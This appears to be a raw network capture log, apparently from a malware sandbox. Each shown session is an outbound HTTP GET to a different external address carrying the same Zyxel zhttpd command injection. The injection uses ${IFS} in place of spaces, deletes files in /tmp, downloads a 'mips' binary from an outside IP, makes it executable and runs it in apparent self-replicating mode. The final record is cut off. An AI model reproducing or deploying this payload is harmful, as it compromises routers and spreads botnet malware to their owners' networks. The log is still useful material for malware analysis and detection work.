                        Session IDSource IPSource PortDestination IPDestination Port
                        2136192.168.2.144403666.116.81.116443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.135562897 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2137192.168.2.1448010217.220.224.131443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.135592937 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2138192.168.2.1449142113.238.157.89443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.135652065 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2139192.168.2.145826444.21.83.77443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.135695934 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2140192.168.2.145804642.204.82.225443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.135747910 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2141192.168.2.144730465.216.90.236443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.135807991 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2142192.168.2.143549620.231.172.78443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.135859966 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2143192.168.2.145743451.7.90.85443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.135891914 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2144192.168.2.1448710165.238.54.43443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.135946035 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2145192.168.2.1453084138.122.8.98443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.136002064 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2146192.168.2.144992052.159.221.34443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.136015892 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2147192.168.2.1454838113.17.191.20443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.136071920 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2148192.168.2.1442354218.140.171.239443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.136118889 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2149192.168.2.145061067.28.195.38443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.136157990 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2150192.168.2.1449126205.38.203.147443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.136199951 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2151192.168.2.1448372142.34.17.200443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.136245966 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2152192.168.2.143484264.120.89.170443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.136286974 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2153192.168.2.145754072.128.205.45443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.136312962 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2154192.168.2.14539464.242.226.117443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.136369944 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2155192.168.2.1434422142.32.99.154443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.136400938 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2156192.168.2.1442274213.75.208.88443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.136446953 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2157192.168.2.1442552115.93.8.232443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.136496067 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2158192.168.2.1434102113.109.243.127443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.136538029 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2159192.168.2.1439506163.244.158.156443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.136565924 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2160192.168.2.144997663.225.245.146443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.136599064 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2161192.168.2.1439780135.133.247.235443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.136651039 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2162192.168.2.146085296.57.147.120443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.136703014 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2163192.168.2.143644883.17.216.76443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.136749029 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2164192.168.2.144758412.32.109.149443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.136804104 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2165192.168.2.144622454.43.71.126443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.136868000 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2166192.168.2.1437508194.36.130.91443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.136912107 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2167192.168.2.143831092.108.121.11443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.136933088 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2168192.168.2.143836819.15.127.33443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.136954069 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2169192.168.2.145539434.253.27.208443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.136997938 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2170192.168.2.14439064.85.249.204443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.137033939 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2171192.168.2.1452252153.115.135.225443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.137093067 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2172192.168.2.1457204157.187.86.223443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.137139082 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2173192.168.2.1451164126.83.78.135443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.137177944 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2174192.168.2.145500438.83.92.56443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.137227058 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2175192.168.2.145158276.5.148.27443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.137276888 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2176192.168.2.1445952110.110.89.0443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.137300968 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2177192.168.2.1439124198.179.156.8443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.137343884 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2178192.168.2.1447288164.188.232.5443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.137396097 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2179192.168.2.1440020146.188.217.214443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.137449026 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2180192.168.2.1451624113.114.192.6443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.137480021 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2181192.168.2.1440358203.21.36.46443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.137520075 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2182192.168.2.145654661.137.32.5443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.137567997 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2183192.168.2.1453150196.9.42.42443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.137612104 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2184192.168.2.1442904161.245.126.45443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.137658119 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2185192.168.2.1444256223.108.15.74443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.137715101 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2186192.168.2.1448966184.97.102.10443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.137773037 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2187192.168.2.1442406207.93.198.69443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.137808084 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2188192.168.2.1434064114.193.17.245443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.137840986 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2189192.168.2.1447830115.204.165.100443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.137870073 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2190192.168.2.1447192189.22.86.83443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.137904882 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2191192.168.2.1450066143.113.176.187443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.137969971 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2192192.168.2.1442130152.87.235.218443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.138015032 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2193192.168.2.145528882.155.168.4443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.138050079 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2194192.168.2.144698247.200.193.86443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.138079882 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2195192.168.2.1443166195.171.201.39443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.138107061 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2196192.168.2.143440444.250.196.167443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.138142109 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2197192.168.2.1456348199.228.152.129443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.138156891 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2198192.168.2.145391857.12.24.223443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.138216019 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2199192.168.2.1436604148.138.212.213443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.138250113 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2200192.168.2.1441980219.81.31.29443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.138298988 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2201192.168.2.1449984133.68.204.140443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.138324022 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2202192.168.2.145112667.157.85.49443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.138377905 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2203192.168.2.144457441.196.67.210443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.138426065 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2204192.168.2.1455536123.42.217.8443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.138473034 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2205192.168.2.144901261.63.216.62443
                        TimestampBytes transferredDirectionData
